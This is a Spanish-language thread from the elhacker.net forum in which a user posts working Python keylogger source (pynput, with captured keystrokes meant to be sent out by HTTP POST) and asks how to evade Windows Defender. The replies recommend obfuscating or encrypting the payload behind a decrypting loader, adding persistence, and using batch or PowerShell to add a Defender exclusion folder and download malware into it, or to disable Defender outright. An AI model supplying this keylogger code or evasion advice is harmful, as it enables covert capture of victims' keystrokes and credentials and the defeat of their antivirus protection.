Evitar ser detectado por Windows defender

Foro de elhacker.net

Seguridad Informática

Análisis y Diseño de Malware (Moderador: fary)

Evitar ser detectado por Windows defender

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1]

Autor

Tema: Evitar ser detectado por Windows defender (Leído 16,068 veces)

elmarkus2

Desconectado

Mensajes: 1

Evitar ser detectado por Windows defender

« en: 25 Octubre 2020, 05:23 am »

Que tal amigos, el día de hoy estuve jugueteando un poco de código en python, hice un pequeño keylogger, aquí les dejo mi código. En pocas palabras, recolecta la información del usuario y la manda a un servidor local por POST.

Este código lo compile con pyinstaller, para generar un archivo .exe. Mi problema es que el windows defender lo reconoce inmediatamente como virus. hay alguna manera de evitar que esto suceda? ¡que me recomiendan?

Espero puedan ayudarme. saludos!

Código:

import datetime
from pynput.keyboard import Listener
import requests

value=""

def key_recorder(key):
    global value
    key=str(key)
    temp=""
    if key=='Key.enter':
        temp='\n'
    elif key=='Key.space':
        temp=' '
    elif key=='Key.backspace':
        temp='<='
    else:
        key=key.replace("'", "")
        temp=key
    value=value+temp
    print(value)

    valueSize=len(value)
    if valueSize>20000:
        callBackend()    
       # sendmail()


def callBackend():
    url = 'http://localhost:5000/api/v1/todos'
    myobj = {'somekey': 'somevalue'}
    x = requests.post(url, data = myobj)
    print(x.text)


with Listener(on_press=key_recorder) as l:
    l.join()


« Última modificación: 25 Octubre 2020, 05:26 am por elmarkus2 »	En línea

el etrno

Desconectado

Mensajes: 14

Re: Evitar ser detectado por Windows defender

« Respuesta #1 en: 12 Noviembre 2020, 05:53 am »

Simplemente ofusca el código (básicamente cifrar el código fuente) otra opción es que tomes el binario y crees un programa en Python con la llave privada que al ejecutarse desencripte y ejecute el binario malicioso la ventaja de esto es que es una forma fácil pero primitiva y no 100% efectiva de ocultar el proceso (lo ocultara de defender pero no de una inspección rápida del gestor de tareas porque sigue existiendo un proceso que no debería).
Note 2 problemas en tu código el primero es que no tienes nada que permita la persistáis y segundo es que nada impide que rastreen tu ip cuando te conectes (y no estoy seguro de si funciona fuera de una red local y seria un grabe problema por limitar el al una red con todos los problemas que eso implica)


	En línea

0x22

Desconectado

Mensajes: 77

Re: Evitar ser detectado por Windows defender

« Respuesta #2 en: 10 Febrero 2022, 21:50 pm »

Yo lo que suelo hacer para evadir windows defender es un script en batch/powershell que añada una carpeta especifica en exclusion para que el windows defender no lo escanee y descargar allí el malware. También puedes desactivarlo con powershell


	En línea

Páginas: [1]

Ir a:

Mensajes similares
	Asunto	Iniciado por	Respuestas	Vistas	Último mensaje
	Apple detalla cómo "evitar y eliminar" el malware Mac Defender Noticias	wolfbcn	0	2,387	26 Mayo 2011, 21:27 pm por wolfbcn
	Microsoft resuelve otro fallo de Windows Defender detectado por Google Noticias	wolfbcn	0	2,337	29 Mayo 2017, 15:03 pm por wolfbcn
	Windows Defender ya tiene Fluent Design y luce tan moderno como Windows 98 Noticias	wolfbcn	0	3,271	21 Abril 2018, 01:44 am por wolfbcn
	Windows Defender pasa a llamarse Microsoft Defender y esta es la razón Noticias	wolfbcn	1	4,513	21 Julio 2019, 15:51 pm por Machacador
	Para evitar ser detectado este malware hasta te pide que completes un CAPTCHA Noticias	El_Andaluz	0	1,990	21 Junio 2020, 22:58 pm por El_Andaluz